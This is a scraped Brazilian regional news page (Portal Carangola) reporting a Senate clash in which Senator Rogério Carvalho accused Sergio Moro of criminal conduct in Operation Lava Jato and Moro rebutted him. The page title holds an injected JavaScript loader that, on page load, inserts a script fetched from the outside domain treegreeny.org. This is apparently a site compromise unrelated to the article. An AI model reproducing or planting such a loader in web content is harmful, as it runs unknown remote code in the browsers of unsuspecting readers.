;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Senador Rogério Carvalho disse que Moro teve uma atuação criminosa no âmbito da operação Lava-Jato. Ele e o ex-juiz federal trocaram farpas na tribuna do Senado

Vinícius Prates

15/03/2023 08:26 – atualizado 15/03/2023 10:28

 

O senador Sergio Moro (União-PR) rebateu as críticas feitas pelo senador Rogério Carvalho (PT-SE), que o acusou de atuar “criminosamente” no âmbito da Operação Lava Jato. O ex-juiz federal foi o responsável por ter condenado o ex-presidente Luiz Inácio Lula da Silva (PT), mas posteriormente o Supremo Tribunal Federal (STF) considerou as condenações de Moro parciais. Nessa terça-feira (14/3), ele e o senador Rogério Carvalho trocaram farpas na tribuna do Senado.

  • Leia:

Senador do PT para Moro: ‘Atuação criminosa de um juiz’

LEIA MAIS

Durante a sessão, Sergio Moro discursava sobre corrupção no Senado, sua principal pauta como parlamentar.

 

Para o senador petista, há necessidade de se combater a corrupção praticada por magistrados. “Notadamente nós sabemos do caso que foi a anulação de todas as condenações do presidente Lula, e me parece que houve um caso de corrupção ao julgar o presidente Lula e portanto isso também precisa ser avaliado”, disse o parlamentar.

 

Moro rebateu as falas de Rogério e disse que o senador estava o acusando de corrupção. Ele alegou que o Partido dos Trabalhadores que “gerou problemas de corrupção”.

 

“Quem gerou esses problemas todos foi a corrupção de seu partido senador, desculpe! Peço que seja tratado com urbanidade nessa tribuna e não de maneira inapropriada, ferindo, inclusive, o regimento”, rebateu Moro. “Eu peço respeito quando estou na tribuna e peço que não seja acusado”, completou.

 

“Eu não posso ficar aqui achando que Vossa Excelência pode falar de corrupção. O senhor destruiu milhares de empregos. Todos os processos que Vossa Excelência julgou foram anulados e isso gerou a cassação dos direitos político de um presidente. O senhor virou ministro do presidente que ganhou a eleição [Sergio Moro foi ministro no governo Bolsonaro], isso não é corrupção?”, disparou Rogério Carvalho para Sergio Moro.

 

Moro encerrou a discussão dizendo que não queria entrar em “bate-boca desnecessário”, mas alegou que precisava repudiar as falas do senador, que ofenderam a sua imagem e o seu trabalho como Juiz Federal.

 

“Quem gerou as oportunidades autoritárias, infelizmente, foi a corrupção dos governos anteriores, que acabou gerando essas descrença na democracia”, finalizou Moro.

Moro x PT 

Moro é um dos nomes mais conhecidos da Operação Lava Jato e o responsável por ter condenado Lula na Operação Lava Jato.

 

Após 580 dias detido, Lula deixou a prisão quando o Supremo Tribunal Federal (STF) determinou que o cumprimento da pena deve ser iniciado após o esgotamento de todos os recursos, opondo-se à prisão após condenação em 2ª instância.

 

Na época, Lula ainda tinha recursos pendentes de análise nas instâncias superiores.

 

Posteriormente, a Corte anulou as condenações de Lula por considerar que o ex-Juiz Federal Sergio Moro atuou parcialmente no julgamento do petista. O STF ainda entendeu que a tramitação do processo ocorreu em jurisdição incompetente para o julgamento do caso.

 

No mandato de senador, Moro promete ser “oposição” e pautar o “combate à corrupção”.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.